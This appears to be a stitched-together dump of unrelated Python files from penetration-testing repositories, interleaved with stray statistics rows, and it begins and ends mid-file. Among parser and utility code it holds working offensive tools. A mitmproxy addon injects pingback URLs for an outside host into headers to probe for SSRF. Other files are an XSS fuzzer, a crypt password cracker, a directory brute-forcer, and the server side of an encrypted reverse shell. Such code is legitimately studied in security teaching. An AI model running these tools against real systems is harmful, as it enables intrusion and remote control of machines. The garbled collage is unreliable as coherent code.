database_lock.release()
if config['debug']:
raise
return []
@staticmethod
@memoize
def requestToString(request):
headers = '\r\n'.join(['{}: {}'.format(k, v) for k, v in request.headers.items()])
out = '{} {} {}\r\n{}'.format(request.command, request.path, request.request_version, headers)
return out
@staticmethod
def getPingbackUrl(request):
#guid = str(uuid.uuid4())
guid = generateRandomId()
url = "http://{}.{}/".format(guid, config['pingback-host'])
return (url, guid)
def saveRequestForCorrelation(self, request, pingback, uuid, where):
query = 'INSERT INTO requests(id, sent, uuid, desthost, pingback, whereput, request) VALUES(%s, %s, %s, %s, %s, %s, %s)'
generatedRequest = PyCollaboratorMitmproxyAddon.requestToString(self.request)
desthost = self.request.headers['Host']
values = ('0', datetime.datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S'), uuid, desthost, pingback, where, generatedRequest)
self.executeSql(query, values)
@staticmethod
def sendRawRequest(request, requestData):
raw = SendRawHttpRequest()
port = 80 if request.scheme == 'http' else 443
return raw.send(request.headers['Host'], port, request.scheme == 'https', requestData)
def hostOverriding(self):
(pingback, uuid) = PyCollaboratorMitmproxyAddon.getPingbackUrl(self.request)
requestData = 'GET {} HTTP/1.1\r\n'.format(pingback)
requestData+= 'Host: {}\r\n'.format(self.request.headers['Host'])
requestData+= 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\r\n'
requestData+= 'Accept: */*\r\n'
requestData+= 'Connection: close\r\n'
self.saveRequestForCorrelation(self.request, pingback, uuid, 'Overridden Host header ({} -> GET {} )'.format(self.request.headers['Host'], pingback))
PyCollaboratorMitmproxyAddon.sendRawRequest(self.request, requestData)
ctx.log.info('(2) Re-sent host overriding request ({} -> {})'.format(self.request.path, pingback))
def hostAtManipulation(self):
(pingback, uuid) = PyCollaboratorMitmproxyAddon.getPingbackUrl(self.request)
url = urljoin(self.request.scheme + '://', self.request.headers['Host'], self.request.path)
parsed = urlparse(pingback)
requestData = 'GET {} HTTP/1.1\r\n'.format(pingback)
requestData+= 'Host: {}@{}\r\n'.format(self.request.headers['Host'], parsed.netloc)
requestData+= 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\r\n'
requestData+= 'Accept: */*\r\n'
requestData+= 'Connection: close\r\n'
self.saveRequestForCorrelation(self.request, pingback, uuid, 'Host header manipulation ({} -> {}@{})'.format(self.request.headers['Host'], self.request.headers['Host'], parsed.netloc))
PyCollaboratorMitmproxyAddon.sendRawRequest(self.request, requestData)
ctx.log.info('(3) Re-sent host header @ manipulated request ({} -> {}@{})'.format(self.request.headers['Host'], self.request.headers['Host'], parsed.netloc))
def sendMisroutedRequests(self):
(pingback, uuid) = PyCollaboratorMitmproxyAddon.getPingbackUrl(self.request)
url = self.request.url
parsed = urlparse(pingback)
self.saveRequestForCorrelation(self.request, pingback, uuid, 'Hijacked Host header ({} -> {})'.format(self.request.headers['Host'], parsed.netloc))
try:
dbg('GET {}'.format(url))
requests.get(url, headers = {'Host' : parsed.netloc})
ctx.log.info('(1) Re-sent misrouted request with hijacked Host header ({} -> {})'.format(self.request.headers['Host'], parsed.netloc))
except (Exception, requests.exceptions.TooManyRedirects) as e:
ctx.log.error('Could not issue request to ({}): {}'.format(url, str(e)))
if config['debug']:
raise
self.hostOverriding()
self.hostAtManipulation()
@memoize
def checkIfAlreadyManipulated(self, host):
query = 'SELECT desthost FROM {}.requests WHERE desthost = "{}"'.format(config['mysql-database'], host)
rows = self.executeSql(query)
if rows == False: return rows
for row in rows:
if self.request.headers['Host'] in row['desthost']:
dbg('Host ({}) already was lured for pingback.'.format(row['desthost']))
return True
dbg('Host ({}) was not yet lured for pingback.'.format(self.request.headers['Host']))
return False
def request_handler(self, req, req_body):
global visited_hosts
self.request = req
self.requestBody = req_body
self.request.scheme = self.request.path.split(':')[0].upper()
allowed_letters = string.ascii_lowercase + string.digits + '-_.'
host = ''.join(list(filter(lambda x: x in allowed_letters, self.request.headers['Host'])))
if (host not in visited_hosts) and (not self.checkIfAlreadyManipulated(host)):
add_host_lock.acquire()
visited_hosts.add(host)
add_host_lock.release()
for header in append_headers:
(pingback, uuid) = PyCollaboratorMitmproxyAddon.getPingbackUrl(self.request)
self.request.headers[header] = pingback
if 'IP' in header:
self.request.headers[header] = '{}.{}'.format(uuid, config['pingback-host'])
self.saveRequestForCorrelation(pingback, header, uuid, 'Header: {}'.format(header))
self.sendMisroutedRequests()
ctx.log.info('Injected pingbacks for host ({}).'.format(host))
return self.requestBody
def requestForMitmproxy(self, flow):
class Request:
def __init__(self, flow):
self.scheme = flow.request.scheme
self.path = flow.request.path
self.method = flow.request.method
self.command = flow.request.method
self.host = str(flow.request.host)
self.port = int(flow.request.port)
self.http_version = flow.request.http_version
self.request_version = flow.request.http_version
self.headers = {}
self.req_body = flow.request.content
self.url = flow.request.url
self.headers['Host'] = self.host
for k,v in flow.request.headers.items():
self.headers[k] = v
def __str__(self):
out = '{} {} {}\r\n'.format(self.method, self.path, self.http_version)
for k, v in self.headers.items():
out += '{}: {}\r\n'.format(k, v)
if self.req_body:
out += '\r\n{}'.format(self.req_body)
return out + '\r\n'
req = Request(flow)
req_body = req.req_body
# ctx.log.info('DEBUG2: req.path = {}'.format(req.path))
# ctx.log.info('DEBUG2: req.url = {}'.format(req.url))
# ctx.log.info('DEBUG5: req.request_version = {}'.format(req.request_version))
# ctx.log.info('DEBUG5: req.headers = {}'.format(str(req.headers)))
# ctx.log.info('DEBUG5: req.req_body = ({})'.format(req.req_body))
# ctx.log.info('DEBUG6: REQUEST BODY:\n{}'.format(str(req)))
return self.request_handler(req, req_body)
def request(flow: http.HTTPFlow) -> None:
globalPyCollaborator.requestForMitmproxy(flow)
globalPyCollaborator = PyCollaboratorMitmproxyAddon()
addons = [request]
| 35.155738 | 192 | 0.585097 |
Effective-Python-Penetration-Testing | import mechanize
url = "http://www.webscantest.com/crosstraining/aboutyou.php"
browser = mechanize.Browser()
attackNumber = 1
with open('XSS-vectors.txt') as f:
for line in f:
browser.open(url)
browser.select_form(nr=0)
browser["fname"] = line
res = browser.submit()
content = res.read()
# check the attack vector is printed in the response.
if content.find(line) > 0:
print "Possible XXS"
output = open('response/'+str(attackNumber)+'.txt', 'w')
output.write(content)
output.close()
print attackNumber
attackNumber += 1
| 23.782609 | 61 | 0.676626 |
cybersecurity-penetration-testing | #!/usr/bin/env python
'''
Author: Christopher Duffy
Date: February 2015
Name: ifacesdetails.py
Purpose: Provides the details related to a systems interfaces
Copyright (c) 2015, Christopher Duffy All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met: * Redistributions
of source code must retain the above copyright notice, this list of conditions and
the following disclaimer. * Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution. * Neither the
name of the nor the names of its contributors may be used to endorse or promote
products derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL CHRISTOPHER DUFFY BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''
import sys
try:
import netifaces
except:
sys.exit("[!] Install the netifaces library: pip install netifaces")
gateways = {}
network_ifaces={}
def get_interfaces():
interfaces = netifaces.interfaces()
return interfaces
def get_gateways():
gateway_dict = {}
gws = netifaces.gateways()
for gw in gws:
try:
gateway_iface = gws[gw][netifaces.AF_INET]
gateway_ip, iface = gateway_iface[0], gateway_iface[1]
gw_list =[gateway_ip, iface]
gateway_dict[gw]=gw_list
except:
pass
return gateway_dict
def get_addresses(interface):
addrs = netifaces.ifaddresses(interface)
link_addr = addrs[netifaces.AF_LINK]
iface_addrs = addrs[netifaces.AF_INET]
iface_dict = iface_addrs[0]
link_dict = link_addr[0]
hwaddr = link_dict.get('addr')
iface_addr = iface_dict.get('addr')
iface_broadcast = iface_dict.get('broadcast')
iface_netmask = iface_dict.get('netmask')
return hwaddr, iface_addr, iface_broadcast, iface_netmask
def get_networks(gateways_dict):
networks_dict = {}
for key, value in gateways.iteritems():
gateway_ip, iface = value[0], value[1]
hwaddress, addr, broadcast, netmask = get_addresses(iface)
network = {'gateway': gateway_ip, 'hwaddr' : hwaddress, 'addr' : addr, 'broadcast' : broadcast, 'netmask' : netmask}
networks_dict[iface] = network
return networks_dict
gateways = get_gateways()
network_ifaces = get_networks(gateways)
print(network_ifaces)
| 38.209877 | 124 | 0.727874 |
owtf | from owtf.managers.resource import get_resources
from owtf.plugin.helper import plugin_helper
DESCRIPTION = "LDAP Plugin to assist manual testing"
def run(PluginInfo):
resource = get_resources("ExternalLDAPinjection")
Content = plugin_helper.resource_linklist("Online Resources", resource)
return Content
| 28.181818 | 75 | 0.78125 |
Python-Penetration-Testing-for-Developers | from scapy.all import *
import struct
interface = 'mon0'
ap_list = []
def info(fm):
if fm.haslayer(Dot11):
if ((fm.type == 0) & (fm.subtype==8)):
if fm.addr2 not in ap_list:
ap_list.append(fm.addr2)
print "SSID--> ",fm.info,"-- BSSID --> ",fm.addr2, \
"-- Channel--> ", ord(fm[Dot11Elt:3].info)
sniff(iface=interface,prn=info)
| 23.857143 | 56 | 0.608069 |
owtf | """
owtf.lib.exceptions
~~~~~~~~~~~~~~~~~~~
Declares the framework exceptions and HTTP errors
"""
try:
from http.client import responses
except ImportError:
from httplib import responses
import tornado.web
class FrameworkException(Exception):
def __init__(self, value):
self.parameter = value
def __repr__(self):
return self.parameter
class APIError(tornado.web.HTTPError):
"""Equivalent to ``RequestHandler.HTTPError`` except for in name"""
def api_assert(condition, *args, **kwargs):
"""Assertion to fail with if not ``condition``
Asserts that ``condition`` is ``True``, else raises an ``APIError``
with the provided ``args`` and ``kwargs``
:type condition: bool
"""
if not condition:
raise APIError(*args, **kwargs)
class FrameworkAbortException(FrameworkException):
pass
class PluginAbortException(FrameworkException):
pass
class UnreachableTargetException(FrameworkException):
pass
class UnresolvableTargetException(FrameworkException):
pass
class DBIntegrityException(FrameworkException):
pass
class InvalidTargetReference(FrameworkException):
pass
class InvalidSessionReference(FrameworkException):
pass
class InvalidTransactionReference(FrameworkException):
pass
class InvalidParameterType(FrameworkException):
pass
class InvalidWorkerReference(FrameworkException):
pass
class InvalidErrorReference(FrameworkException):
pass
class InvalidWorkReference(FrameworkException):
pass
class InvalidConfigurationReference(FrameworkException):
pass
class InvalidUrlReference(FrameworkException):
pass
class InvalidActionReference(FrameworkException):
pass
class InvalidMessageReference(FrameworkException):
pass
class InvalidMappingReference(FrameworkException):
pass
class DatabaseNotRunningException(Exception):
pass
class PluginException(Exception):
pass
class PluginsDirectoryDoesNotExist(PluginException):
"""The specified plugin directory does not exist."""
class PluginsAlreadyLoaded(PluginException):
"""`load_plugins()` called twice."""
| 17.067227 | 71 | 0.74174 |
Python-for-Offensive-PenTest | # Python For Offensive PenTest
# Download Pycrypto for Windows - pycrypto 2.6 for win32 py 2.7
# http://www.voidspace.org.uk/python/modules.shtml#pycrypto
# Download Pycrypto source
# https://pypi.python.org/pypi/pycrypto
# For Kali, after extract the tar file, invoke "python setup.py install"
# Hybrid - Server- TCP Reverse Shell
import socket
from Crypto.PublicKey import RSA
from Crypto.Cipher import AES
import string
import random
def encrypt_AES_KEY(KEY):
publickey ="""-----BEGIN PUBLIC KEY-----
MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEA9UHDhYrU529GsfkJqKSF
6q3CfpSkb00gA12c3NuNb2QZgpkHRsfQ/zPmKlFvuAHNjn43j3ser/SQ6q0GN92N
niK9cne+UdKoXf0e+8PqZsoIlOXh9QNPnuXmD+o6tXevh3ZpUyCaNPiF+g0fHv12
w1xCkVki5Kp+hf8YbB6lCxUJvf8a0n1bWCBKkbe2jJUOjkVLIvUVkojCOw61stHZ
QJtFgGQUup4D0cozs5bXHfRw7Tc7Q2VEnTOGfIEZJcC7FbboMaQxRu0v7KKH93OR
HlIEbZFFX7kelrR8S8pnIfspZXHrAmSImlWDljeSZpMViTGLBniw0kztDLtQJSY4
HL4SkOTm0QgsO1dkbs3PR2RsYh7aaDWgAATT0MPhQMUNMIdceaEJeYiudsBFMLMQ
JHok3+0MR/1eO4aO2nH5ojANXxOyec8V3IXz0LZCGFsrfB9gv9TD/YRs6qEF62wl
tDqIGyVQoXQNmxriH+0YgMwxUPKHiGVCaPYXe5dpd89GeGYC6Jcbc9+q9cjfG+kR
GQtgr/w48RM79bBHw5A0b3uXqmjTPTgZ6hMxShMWngSHOm5BV+ZY1MyEA51+qDon
GOLCYLRGWnF1PyCMoxX+qVEE6gAFVNkYULdjiWpU+gmoYxe0rNqjCzbUdXizUGVQ
Ua9aLXDYbrOz6O1gKngclsECAwEAAQ==
-----END PUBLIC KEY-----"""
encryptor = RSA.importKey(publickey)
encriptedData=encryptor.encrypt(KEY, 0)
return encriptedData[0]
def encrypt(message):
encrypto = AES.new(key, AES.MODE_CTR, counter=lambda: counter)
return encrypto.encrypt(message)
def decrypt(message):
decrypto = AES.new(key, AES.MODE_CTR, counter=lambda: counter)
return decrypto.decrypt(message)
def connect():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("10.10.10.100", 8080))
s.listen(1)
print '[+] Listening for incoming TCP connection on port 8080'
conn, addr = s.accept()
print '[+] We got a connection from: ', addr
global key
key = ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.ascii_lowercase + string.digits + '^!\$%&/()=?{[]}+~#-_.:,;<>|\\') for _ in range(32))
print "Generated AES Key " + str(key)
conn.send ( encrypt_AES_KEY(key) )
global counter
counter = ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.ascii_lowercase + string.digits + '^!\$%&/()=?{[]}+~#-_.:,;<>|\\') for _ in range(16))
conn.send ( encrypt_AES_KEY(counter) )
while True:
command = raw_input("Shell> ")
command = encrypt(command)
if 'terminate' in command:
conn.send('terminate')
conn.close()
break
else:
conn.send(command)
print decrypt ( conn.recv(1024) )
def main ():
connect()
main()
| 27.046729 | 169 | 0.668333 |
PenetrationTestingScripts | # Taken from Python 2.6.4 for use by _sgmllib.py
"""Shared support for scanning document type declarations in HTML and XHTML.
This module is used as a foundation for the HTMLParser and sgmllib
modules (indirectly, for htmllib as well). It has no documented
public API and should not be used directly.
"""
import re
_declname_match = re.compile(r'[a-zA-Z][-_.a-zA-Z0-9]*\s*').match
_declstringlit_match = re.compile(r'(\'[^\']*\'|"[^"]*")\s*').match
_commentclose = re.compile(r'--\s*>')
_markedsectionclose = re.compile(r']\s*]\s*>')
# An analysis of the MS-Word extensions is available at
# http://www.planetpublish.com/xmlarena/xap/Thursday/WordtoXML.pdf
_msmarkedsectionclose = re.compile(r']\s*>')
del re
class ParserBase:
"""Parser base class which provides some common support methods used
by the SGML/HTML and XHTML parsers."""
def __init__(self):
if self.__class__ is ParserBase:
raise RuntimeError(
"markupbase.ParserBase must be subclassed")
def error(self, message):
raise NotImplementedError(
"subclasses of ParserBase must override error()")
def reset(self):
self.lineno = 1
self.offset = 0
def getpos(self):
"""Return current line number and offset."""
return self.lineno, self.offset
# Internal -- update line number and offset. This should be
# called for each piece of data exactly once, in order -- in other
# words the concatenation of all the input strings to this
# function should be exactly the entire input.
def updatepos(self, i, j):
if i >= j:
return j
rawdata = self.rawdata
nlines = rawdata.count("\n", i, j)
if nlines:
self.lineno = self.lineno + nlines
pos = rawdata.rindex("\n", i, j) # Should not fail
self.offset = j-(pos+1)
else:
self.offset = self.offset + j-i
return j
_decl_otherchars = ''
# Internal -- parse declaration (for use by subclasses).
def parse_declaration(self, i):
# This is some sort of declaration; in "HTML as
# deployed," this should only be the document type
# declaration ("<!DOCTYPE html...>").
# ISO 8879:1986, however, has more complex
# declaration syntax for elements in <!...>, including:
# --comment--
# [marked section]
# name in the following list: ENTITY, DOCTYPE, ELEMENT,
# ATTLIST, NOTATION, SHORTREF, USEMAP,
# LINKTYPE, LINK, IDLINK, USELINK, SYSTEM
rawdata = self.rawdata
j = i + 2
assert rawdata[i:j] == "<!", "unexpected call to parse_declaration"
if rawdata[j:j+1] == ">":
# the empty comment <!>
return j + 1
if rawdata[j:j+1] in ("-", ""):
# Start of comment followed by buffer boundary,
# or just a buffer boundary.
return -1
# A simple, practical version could look like: ((name|stringlit) S*) + '>'
n = len(rawdata)
if rawdata[j:j+2] == '--': #comment
# Locate --.*-- as the body of the comment
return self.parse_comment(i)
elif rawdata[j] == '[': #marked section
# Locate [statusWord [...arbitrary SGML...]] as the body of the marked section
# Where statusWord is one of TEMP, CDATA, IGNORE, INCLUDE, RCDATA
# Note that this is extended by Microsoft Office "Save as Web" function
# to include [if...] and [endif].
return self.parse_marked_section(i)
else: #all other declaration elements
decltype, j = self._scan_name(j, i)
if j < 0:
return j
if decltype == "doctype":
self._decl_otherchars = ''
while j < n:
c = rawdata[j]
if c == ">":
# end of declaration syntax
data = rawdata[i+2:j]
if decltype == "doctype":
self.handle_decl(data)
else:
self.unknown_decl(data)
return j + 1
if c in "\"'":
m = _declstringlit_match(rawdata, j)
if not m:
return -1 # incomplete
j = m.end()
elif c in "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ":
name, j = self._scan_name(j, i)
elif c in self._decl_otherchars:
j = j + 1
elif c == "[":
# this could be handled in a separate doctype parser
if decltype == "doctype":
j = self._parse_doctype_subset(j + 1, i)
elif decltype in ("attlist", "linktype", "link", "element"):
# must tolerate []'d groups in a content model in an element declaration
# also in data attribute specifications of attlist declaration
# also link type declaration subsets in linktype declarations
# also link attribute specification lists in link declarations
self.error("unsupported '[' char in %s declaration" % decltype)
else:
self.error("unexpected '[' char in declaration")
else:
self.error(
"unexpected %r char in declaration" % rawdata[j])
if j < 0:
return j
return -1 # incomplete
# Internal -- parse a marked section
# Override this to handle MS-word extension syntax <![if word]>content<![endif]>
def parse_marked_section(self, i, report=1):
rawdata= self.rawdata
assert rawdata[i:i+3] == '<![', "unexpected call to parse_marked_section()"
sectName, j = self._scan_name( i+3, i )
if j < 0:
return j
if sectName in ("temp", "cdata", "ignore", "include", "rcdata"):
# look for standard ]]> ending
match= _markedsectionclose.search(rawdata, i+3)
elif sectName in ("if", "else", "endif"):
# look for MS Office ]> ending
match= _msmarkedsectionclose.search(rawdata, i+3)
else:
self.error('unknown status keyword %r in marked section' % rawdata[i+3:j])
if not match:
return -1
if report:
j = match.start(0)
self.unknown_decl(rawdata[i+3: j])
return match.end(0)
# Internal -- parse comment, return length or -1 if not terminated
def parse_comment(self, i, report=1):
rawdata = self.rawdata
if rawdata[i:i+4] != '<!--':
self.error('unexpected call to parse_comment()')
match = _commentclose.search(rawdata, i+4)
if not match:
return -1
if report:
j = match.start(0)
self.handle_comment(rawdata[i+4: j])
return match.end(0)
# Internal -- scan past the internal subset in a <!DOCTYPE declaration,
# returning the index just past any whitespace following the trailing ']'.
def _parse_doctype_subset(self, i, declstartpos):
rawdata = self.rawdata
n = len(rawdata)
j = i
while j < n:
c = rawdata[j]
if c == "<":
s = rawdata[j:j+2]
if s == "<":
# end of buffer; incomplete
return -1
if s != "<!":
self.updatepos(declstartpos, j + 1)
self.error("unexpected char in internal subset (in %r)" % s)
if (j + 2) == n:
# end of buffer; incomplete
return -1
if (j + 4) > n:
# end of buffer; incomplete
return -1
if rawdata[j:j+4] == "<!--":
j = self.parse_comment(j, report=0)
if j < 0:
return j
continue
name, j = self._scan_name(j + 2, declstartpos)
if j == -1:
return -1
if name not in ("attlist", "element", "entity", "notation"):
self.updatepos(declstartpos, j + 2)
self.error(
"unknown declaration %r in internal subset" % name)
# handle the individual names
meth = getattr(self, "_parse_doctype_" + name)
j = meth(j, declstartpos)
if j < 0:
return j
elif c == "%":
# parameter entity reference
if (j + 1) == n:
# end of buffer; incomplete
return -1
s, j = self._scan_name(j + 1, declstartpos)
if j < 0:
return j
if rawdata[j] == ";":
j = j + 1
elif c == "]":
j = j + 1
while j < n and rawdata[j].isspace():
j = j + 1
if j < n:
if rawdata[j] == ">":
return j
self.updatepos(declstartpos, j)
self.error("unexpected char after internal subset")
else:
return -1
elif c.isspace():
j = j + 1
else:
self.updatepos(declstartpos, j)
self.error("unexpected char %r in internal subset" % c)
# end of buffer reached
return -1
# Internal -- scan past <!ELEMENT declarations
def _parse_doctype_element(self, i, declstartpos):
name, j = self._scan_name(i, declstartpos)
if j == -1:
return -1
# style content model; just skip until '>'
rawdata = self.rawdata
if '>' in rawdata[j:]:
return rawdata.find(">", j) + 1
return -1
# Internal -- scan past <!ATTLIST declarations
def _parse_doctype_attlist(self, i, declstartpos):
rawdata = self.rawdata
name, j = self._scan_name(i, declstartpos)
c = rawdata[j:j+1]
if c == "":
return -1
if c == ">":
return j + 1
while 1:
# scan a series of attribute descriptions; simplified:
# name type [value] [#constraint]
name, j = self._scan_name(j, declstartpos)
if j < 0:
return j
c = rawdata[j:j+1]
if c == "":
return -1
if c == "(":
# an enumerated type; look for ')'
if ")" in rawdata[j:]:
j = rawdata.find(")", j) + 1
else:
return -1
while rawdata[j:j+1].isspace():
j = j + 1
if not rawdata[j:]:
# end of buffer, incomplete
return -1
else:
name, j = self._scan_name(j, declstartpos)
c = rawdata[j:j+1]
if not c:
return -1
if c in "'\"":
m = _declstringlit_match(rawdata, j)
if m:
j = m.end()
else:
return -1
c = rawdata[j:j+1]
if not c:
return -1
if c == "#":
if rawdata[j:] == "#":
# end of buffer
return -1
name, j = self._scan_name(j + 1, declstartpos)
if j < 0:
return j
c = rawdata[j:j+1]
if not c:
return -1
if c == '>':
# all done
return j + 1
# Internal -- scan past <!NOTATION declarations
def _parse_doctype_notation(self, i, declstartpos):
name, j = self._scan_name(i, declstartpos)
if j < 0:
return j
rawdata = self.rawdata
while 1:
c = rawdata[j:j+1]
if not c:
# end of buffer; incomplete
return -1
if c == '>':
return j + 1
if c in "'\"":
m = _declstringlit_match(rawdata, j)
if not m:
return -1
j = m.end()
else:
name, j = self._scan_name(j, declstartpos)
if j < 0:
return j
# Internal -- scan past <!ENTITY declarations
def _parse_doctype_entity(self, i, declstartpos):
rawdata = self.rawdata
if rawdata[i:i+1] == "%":
j = i + 1
while 1:
c = rawdata[j:j+1]
if not c:
return -1
if c.isspace():
j = j + 1
else:
break
else:
j = i
name, j = self._scan_name(j, declstartpos)
if j < 0:
return j
while 1:
c = self.rawdata[j:j+1]
if not c:
return -1
if c in "'\"":
m = _declstringlit_match(rawdata, j)
if m:
j = m.end()
else:
return -1 # incomplete
elif c == ">":
return j + 1
else:
name, j = self._scan_name(j, declstartpos)
if j < 0:
return j
# Internal -- scan a name token and the new position and the token, or
# return -1 if we've reached the end of the buffer.
def _scan_name(self, i, declstartpos):
rawdata = self.rawdata
n = len(rawdata)
if i == n:
return None, -1
m = _declname_match(rawdata, i)
if m:
s = m.group()
name = s.strip()
if (i + len(s)) == n:
return None, -1 # end of buffer
return name.lower(), m.end()
else:
self.updatepos(declstartpos, i)
self.error("expected name token at %r"
% rawdata[declstartpos:declstartpos+20])
# To be overridden -- handlers for unknown objects
def unknown_decl(self, data):
pass
| 35.548223 | 92 | 0.47295 |
diff-droid | def update():
print "to do : do git update" | 23 | 33 | 0.617021 |
owtf | from owtf.plugin.helper import plugin_helper
DESCRIPTION = "Plugin to assist manual testing"
def run(PluginInfo):
Content = plugin_helper.HtmlString("Intended to show helpful info in the future")
return Content
| 23.777778 | 85 | 0.765766 |
cybersecurity-penetration-testing | #!/usr/bin/python
# -*- coding: utf-8 -*-
import crypt
def testPass(cryptPass):
salt = cryptPass[0:2]
dictFile = open('dictionary.txt', 'r')
for word in dictFile.readlines():
word = word.strip('\n')
cryptWord = crypt.crypt(word, salt)
if cryptWord == cryptPass:
print '[+] Found Password: ' + word + '\n'
return
print '[-] Password Not Found.\n'
return
def main():
passFile = open('passwords.txt')
for line in passFile.readlines():
if ':' in line:
user = line.split(':')[0]
cryptPass = line.split(':')[1].strip(' ')
print '[*] Cracking Password For: ' + user
testPass(cryptPass)
if __name__ == '__main__':
main()
| 23.387097 | 54 | 0.529801 |
cybersecurity-penetration-testing | #!/usr/bin/env python
'''
Author: Christopher Duffy
Date: April 2015
Name: dirtester.py
Purpose: To identify unlinked and hidden files or directories within web applications
Copyright (c) 2015, Christopher Duffy All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met: * Redistributions
of source code must retain the above copyright notice, this list of conditions and
the following disclaimer. * Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution. * Neither the
name of the nor the names of its contributors may be used to endorse or promote
products derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL CHRISTOPHER DUFFY BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''
import urllib2, argparse, sys
def host_test(filename, host):
file = "headrequests.log"
bufsize = 0
e = open(file, 'a', bufsize)
print("[*] Reading file %s") % (file)
with open(filename) as f:
locations = f.readlines()
for item in locations:
target = host + "/" + item
try:
request = urllib2.Request(target)
request.get_method = lambda : 'GET'
response = urllib2.urlopen(request)
except:
print("[-] %s is invalid") % (str(target.rstrip('\n')))
response = None
if response != None:
print("[+] %s is valid") % (str(target.rstrip('\n')))
details = response.info()
e.write(str(details))
e.close()
def main():
# If script is executed at the CLI
usage = '''usage: %(prog)s [-t http://127.0.0.1] [-f wordlist] -q -v -vv -vvv'''
parser = argparse.ArgumentParser(usage=usage)
parser.add_argument("-t", action="store", dest="target", default=None, help="Host to test")
parser.add_argument("-f", action="store", dest="filename", default=None, help="Filename of directories or pages to test for")
parser.add_argument("-v", action="count", dest="verbose", default=1, help="Verbosity level, defaults to one, this outputs each command and result")
parser.add_argument("-q", action="store_const", dest="verbose", const=0, help="Sets the results to be quiet")
parser.add_argument('--version', action='version', version='%(prog)s 0.42b')
args = parser.parse_args()
# Argument Validator
if len(sys.argv)==1:
parser.print_help()
sys.exit(1)
if (args.target == None) or (args.filename == None):
parser.print_help()
sys.exit(1)
# Set Constructors
verbose = args.verbose # Verbosity level
filename = args.filename # The data to use for the dictionary attack
target = args.target # Password or hash to test against default is admin
host_test(filename, target)
if __name__ == '__main__':
main()
| 44.060976 | 151 | 0.691391 |
Hands-On-Penetration-Testing-with-Python | from XtremeWebAPP.xtreme_server.models import *
from django.contrib import admin
admin.site.register(Project)
admin.site.register(Settings)
admin.site.register(Page)
admin.site.register(Form)
admin.site.register(LearntModel)
admin.site.register(Vulnerability) | 28.888889 | 48 | 0.809701 |
Penetration_Testing | #!/usr/bin/python
# Converts to hex, ascii, decimal, octal, binary, base64, or little-endian.
import sys
from binascii import unhexlify, b2a_base64
def ascToHex(string):
in_hex = string.encode('hex')
return in_hex
def toLittleEndian(string):
little_endian = '0x' + "".join(reversed([string[i:i+2]
for i in range(0, len(string), 2)]))
return little_endian
def toDecimal(string):
in_dec = int(string, 16)
return in_dec
def toAscii(string):
in_ascii = string.decode('hex')
return in_ascii
def toOctal(string):
in_oct = ""
c = 0
for char in string:
c = ord(char)
octa = oct(c)
in_oct += ' ' + str(octa)
return in_oct
def hexToBin(string):
in_hex = int(string, 16)
in_bin = bin(in_hex)[2:]
return in_bin
def binToHex(string):
in_hex = hex(int(string, 2))
return in_hex
def decToHex(number):
in_hex = hex(int(number))
return in_hex
def hexToB64(string):
raw = unhexlify(string)
in_b64 = b2a_base64(raw)
return in_b64
def main():
if len(sys.argv[1:]) != 2:
print '''
format_convert: Convert to hex, ascii, decimal, octal, binary, base64 or little-endian.
Usage: ./format_convert.py <string> <option>
Example: ./format_convert.py 41 -2ascii
Options:
-asc2hex : Ascii to hex
-2ascii : Hex to ascii
-2dec : To decimal
-2oct : To octal
-2le : Big endian to little endian
-hex2bin : Hex to binary
-bin2hex : Binary to hex
-dec2hex : Decimal to hex
-hex2b64 : Hex to base64
'''
sys.exit(0)
# Original input
to_convert = sys.argv[1]
mode = sys.argv[2]
# Conversion
if mode == '-asc2hex':
